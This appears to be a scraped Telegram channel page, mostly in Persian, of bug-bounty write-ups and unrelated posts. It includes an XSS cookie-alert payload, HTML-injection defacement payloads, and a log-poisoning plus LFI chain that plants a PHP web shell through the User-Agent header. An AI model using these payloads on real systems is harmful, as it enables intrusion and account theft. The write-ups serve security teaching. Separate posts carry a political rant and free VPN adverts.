Life and Learning🎭 – Telegram
Life and Learning🎭
372 subscribers
55 photos
29 videos
11 files
61 links
Hello, welcome to my channel, I hope the posts of this channel add something to you

ADMIN:https://news.1rj.ru/str/AlI_VD2005
Twitter: https://x.com/CountMoteVaziri
Download Telegram
خروجی کار هم به این صورت هستش که میتونید ببینید که پیغام به صورت عادی رفلکت شده

و در نهایت باید بگم که این آسیب پذیری در همه جا پیدا نمیشه و آسیب پذیری همه گیری نیست شاید در طول کل عمر کاری من 10 بار نشده تعداد این آسیب پذیری ولی خب تست کردنش خالی از لطف نیست!

#باگ_بانتی | #رایتاپ
👍6
در بعضی از سایت ها باید بشینین و تحلیل کنید که چطور با XSS میتونید برسید همیشه با پیلود های ساده نمیتونید دست پیدا کنید مثل این پیلود که خیلی عجیب و البته هوشمندانه بود !
https://example.com/?q=testsec'})});alert(document.cookie);$(function () { app.product.filter.init({ noscript: '


#باگ_بانتی | #رایتاپ
🔥41
بعضی وقتا شما یه HTML Injection کشف میکنید که میخواید از طریقش صفحه دیفیسی رو ترتیب بدید ولی نمیتونید ! پیلود زیر رو اول وارد میکنید
<div style='position: fixed; top: 0; left: 0; width: 100%; height: 100%;
background-color: rgba(0, 0, 0, 0.8); z-index: 9999;
display: flex; justify-content: center; align-items: center;
color: white; font-size: 2em; font-family: sans-serif;'>
تست آسیب پذیری در وبسایت هدف
</div>

ولی نتیجه نمیگیرید و اتربیوت و تگ استایل رو برنامه نویس بسته ولی شما نباید تسلیم بشید ! امروزه اکثر وبسایت ها دارن از بوت استرپ استفاده میکنن شما میتونید از طریق بوت استرپ این کار رو انجام بدید و همان خروجی را دریافت کنید با پیلود زیر
<div class='position-fixed top-0 start-0 w-100 h-100 d-flex justify-content-center align-items-center bg-dark bg-opacity-75 text-white fs-2' style='z-index: 9999;'>
تست آسیب‌پذیری در وب‌سایت
</div>


و اینطوری بود که یه آسیب پذیری روی یه وبسایت معروف ایرانی به نام .... ثبت شد!

#باگ_بانتی | #رایتاپ
6👍2😁1
تزریق لاگ سرور + LFI → RCE

1️⃣ برنامه ورودی کاربر (مثلاً User-Agent) را در یک فایل لاگ ذخیره می‌کند.

2️⃣ مهاجم کد PHP را تزریق می‌کند:

User-Agent: <?php system($_GET['cmd']); ?>

3️⃣ فایل لاگ در root ذخیره می‌شود: /logs/access.log

4️⃣ اگر آسیب‌پذیری LFI وجود داشته باشد:
/index?page=../../logs/access.log&cmd=id

Nullsecurityx
#باگ_بانتی | #رایتآپ
6
پستی از استاد منصوری!
👍8
Developer on the TOP!😁❤️
😁11
پستی از استاد منصوری!

نشت توکن بازنشانی رمز عبور از طریق Referer

اجازه بدید به زبان ساده و قدم به قدم توضیح بدم که این مشکل امنیتی (نشت توکن بازنشانی رمز عبور از طریق Referer) چیه و چطور اتفاق می‌افته:

1. کاربر درخواست بازنشانی رمز عبور می‌کنه:
فرض کنید شما رمز عبورتون رو فراموش کردید و توی یه وب‌سایت می‌خواید رمز جدید بسازید. توی صفحه بازنشانی رمز عبور، ایمیل‌تون (مثلاً v@mail.com) رو وارد می‌کنید و دکمه "ارسال" رو می‌زنید. وب‌سایت یه درخواست (POST) به سرورش می‌فرسته تا فرآیند بازنشانی شروع بشه.

2. وب‌سایت یه ایمیل با لینک بازنشانی می‌فرسته:
سرور وب‌سایت یه توکن (یه کد منحصربه‌فرد و موقت) تولید می‌کنه و یه لینک حاوی این توکن رو توی ایمیل براتون می‌فرسته. مثلاً لینکی مثل این:
https://example.com/reset?token=abc123
این لینک قرار هست شما رو به صفحه‌ای ببره که بتونید رمز جدید وارد کنید.

3. مشکل امنیتی توی بارگذاری تصویر خارجی:
وقتی روی لینک کلیک می‌کنید، مرورگرتون شما رو به صفحه بازنشانی رمز می‌بره. حالا فرض کنید این صفحه یه تصویر (مثلاً یه لوگو یا تبلیغ) از یه وب‌سایت دیگه (خارجی) بارگذاری می‌کنه. مرورگر شما برای لود کردن این تصویر، یه درخواست به سرور اون وب‌سایت خارجی می‌فرسته.

🔅توی این درخواست، مرورگر به‌طور خودکار آدرس صفحه‌ای که توش هستید (یعنی همون لینک بازنشانی با توکن) رو توی هدر Referer می‌فرسته. مثلاً:
Referer: https://example.com/reset?token=abc123
این یعنی توکن حساس شما به سرور اون وب‌سایت خارجی نشت می‌کنه!

4. مهاجم به توکن دسترسی پیدا می‌کنه:
اگه اون وب‌سایت خارجی مخرب باشه یا سرورش هک شده باشه، مهاجم می‌تونه هدر Referer رو ببینه و توکن شما رو بدزده. با داشتن این توکن، مهاجم می‌تونه به صفحه بازنشانی رمز بره و رمز عبور حساب شما رو عوض کنه.

چرا این خطرناکه⁉️
چون توکن بازنشانی رمز عبور مثل یه کلید موقت برای دسترسی به حساب شماست. اگه به دست غریبه بیفته، می‌تونن حساب شما رو کنترل کنن.

#باگ_بانتی | #امنیت
👍31
Forwarded from World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده.
استفاده کنید ؛)
👎2
World Of Security
دوستان شودان برای ۲۴ ساعت اکانت membership رو رایگان کرده. استفاده کنید ؛)
دوستان رایگان نشده عضویتش با ۵ دلار شده فکر کنم! تاریخش تموم شده دوستان!!!!
👍4👌1
وقتی میگم که بعضی باگ های منجر به تصاحب اکانت phpyadmin میشه منظورم اینه !
🤯10🆒1
جدیدا در یه سری از ابزار هایی که برای هانت استفاده میکردم اینو خیلی دیدم واقعا متاسفام برای دنیا و اروپا !
11 سپتامبر یه هواپیما رفت و برج دوقولو رو زد و یه عمره دارن براش عذاداری میکنن ولی اسراییل داره چندین دهس که فلسطین رو زیر تیر میگیره کلی بچه ناقص شدن ، خیلی از مادرا مفقود شدن بچه هاشون ، کنده شدن اعضای بدن خانواده هاشون رو دیدن ، و تنها کاری که اروپا میکنه و نشست های بین الملل میکنن چیه ؟ بازخواست؟ اونا بازخواست میکنن و اینم نمیره چندین ساله همینه روند و این واقعا باعث تاسفه


امیدوارم که اتفاقی که همه مسلمان ها و مسیحیان منتظرشن اتفاق بیوفته و حق اسراییل و امریکا داده بشه و امیدوارم یه ذره کشور های عربی مثل عربستان به فکر بیوفته که دیگه گاو شیر ده نیست و نفر بعدی بعد فلسطین اونه !!!! و امیدوارم که تموم بشه!


#مرگ_بر_ظالمان_زمانه
15🕊3🤡2👍1👏1
سایت‌های پورنوگرافی از فایل‌های آلوده .noscript به عنوان کلیکر استفاده می‌کنند : محققان Malwarebytes موج جدیدی از سوءاستفاده از پسوند .noscript را کشف کرده‌اند – این بار از ده‌ها سایت پورنوگرافی – که از تصاویر آلوده برای فریب مرورگرهای کاربران جهت «لایک» کردن مخفیانه پست‌های فیس‌بوک آنها استفاده می‌کنند.

این طرح به این صورت عمل می‌کند: به بازدیدکننده یک فایل .noscript نشان داده می‌شود و اگر روی تصویر کلیک کند، جاوااسکریپت به طور نامحسوس در مرورگر فعال می‌شود که یک «لایک» برای صفحه مورد نظر ایجاد می‌کند – البته به شرطی که کاربر یک حساب کاربری فیسبوک داشته باشد.

درون این فایل‌های .noscript، کد بسیار مبهمی پنهان شده است که با استفاده از تکنیک اصلاح‌شده‌ی JSFuck که جاوااسکریپت را به «دیواری» آشفته از کاراکترها تبدیل می‌کند، پنهان شده است.

وقتی رمزگشایی می‌شود، مشخص می‌شود که اسکریپت زنجیره‌ی دیگری از کدهای مبهم و در نهایت، بدافزاری به نام Trojan.JS.Likejack را بارگذاری می‌کند. این بدافزار بدون اطلاع کاربر، به طور خودکار روی دکمه‌ی «لایک» کلیک می‌کند.

Malwarebytes خاطرنشان می‌کند که تمام سایت‌های شناسایی‌شده توسط وردپرس پشتیبانی می‌شوند. فیس‌بوک (که در روسیه به عنوان یک شبکه افراطی شناخته شده و ممنوع است) به صورت دوره‌ای چنین حساب‌ها و صفحات جعلی را مسدود می‌کند، اما مدیران آنها به سرعت با پروفایل‌های جدید بازمی‌گردند.

این اولین باری نیست که از .noscript سوءاستفاده می‌شود. مجرمان سایبری قبلاً از فایل‌های SVG برای سرقت رمزهای عبور حساب‌های گوگل و مایکروسافت استفاده کرده‌اند.
🆒3
This media is not supported in your browser
VIEW IN TELEGRAM
حقیقتا اونا مرد تر بودن، متعهد تر بودن!
4👎1👌1
This media is not supported in your browser
VIEW IN TELEGRAM
زمین هر ۲۳ ساعت و ۵۶ دقیقه یک بار به دور محور فرضی خود می‌چرخد؛ این پدیده که «حرکت وضعی» نام دارد، عامل به‌وجود آمدن شب و روز است. این چرخش باعث می‌شود خورشید در آسمان طلوع و غروب کند، ستارگان جابه‌جا شوند و آسمان شب در گذر زمان تغییر کند. ثبت آسمان با یک دوربین ثابت در طول شب، رد دایره‌ای ستارگان را نشان می‌دهد که نتیجه مستقیم این حرکت است.

پروکسی 👉  پروکسی 👉 پروکسی 👉
👈کانفیگ وی پی ان رایگان👉
🆒31🔥1
اطلاعیه!!!

من توی بررسی یه سایت خدماتی یه سری آسیب پذیری خطرناک کشف کردم ، که گفتن در ازای پاداش خدمات رو براتون رایگان انجام میدیم! اگر از دوستان و از کانال کسی هست که میخاد اپلیکیشن حرفه ای طراحی کنه با کمترین هزینه این موقعیت خوبیه بیاد و با هم همکاری کنیم و من معرفیش کنم و اپ خودشو ران کنه ، و از نظر هزینه هم من پاییین ترین مبلغ ممکنه نسبت به طراحی اپلیکیشن رو لحاظ میکنه!

هزینه رو به صورت توافقی جلو میبریمش! (قیمت حداقلی 50 درصد زیر قیمت)
🔥8
Forwarded from GO-TO CVE
https://news.1rj.ru/str/CVEdb چنل دوم ما رو دنبال کنید عزیزان اگه دوست دارید اپیزود هارو یک جا ببنید
3
پروژه جدید امنیتی!

در باگ بانتی تا یه جایی دستی و منوال میتونی کار کنی ، بریم برا پروژه اتومیشن چندین اسیب پذیری و ریکان براش CLI و UI فرانت زدم ماهه
شاید اگر شمام موافق بودید به اشتراک گذاشتیمش! مثلا پلنیش کنیم یه 30 روزه رایگان بزاریم بعدش دیگه یه مبلغ خیلی کمی بگیریم و اشتراک بدیم! مثل شودان ولی خب این کوچیک تره


ببینیم چطور میشه !

#باگ_بانتی | #ابزار_نویسی
🔥7👎2